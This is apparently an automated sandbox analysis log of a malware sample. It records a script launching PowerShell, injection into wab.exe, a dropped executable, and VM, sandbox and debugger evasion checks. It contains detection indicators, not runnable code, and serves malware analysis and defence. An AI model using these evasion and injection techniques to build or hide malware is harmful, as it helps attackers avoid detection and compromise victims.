Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2570000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22E30000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22C70000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5721 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4183 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6290 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3519 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3561 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 6277 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep count: 6290 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep count: 3519 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -24903104499507879s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6488 Thread sleep count: 3561 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6488 Thread sleep count: 6277 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99656s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99544s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99437s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99328s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99219s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -99000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98886s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98778s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98672s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98562s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98453s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98341s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98233s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98125s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97906s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97797s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97687s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97578s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97468s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97359s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97250s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97140s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -97031s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96921s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96801s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96672s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96562s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96442s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96312s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96202s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -96094s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95969s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95859s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95740s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95609s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95390s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95281s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95171s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -95062s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -94953s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -94844s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -94734s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -94625s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464 Thread sleep time: -94515s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99544 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99437 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99328 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98886 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98778 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98672 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98562 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98453 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98341 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98233 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98125 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97797 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97687 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97578 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97468 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97359 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97250 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97140 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97031 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96921 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96801 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96672 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96562 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96442 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96312 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96202 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96094 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95969 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95740 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95609 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95500 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95390 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95281 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95171 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95062 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94734 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94515 Jump to behavior
Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:
Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000004.00000002.1999089456.00000000074A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2279767927.00000221EBE1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: wscript.exe, 00000000.00000003.1643712541.000002B3F1A67000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_025770B8 CheckRemoteDebuggerPresent, 9_2_025770B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_047CA758 LdrInitializeThunk, 4_2_047CA758
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00621AE4 GetProcessHeap,HeapFree, 10_2_00621AE4
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_006232C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_006232C0
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00623450 SetUnhandledExceptionFilter, 10_2_00623450
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A60000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 257FE24 Jump to behavior
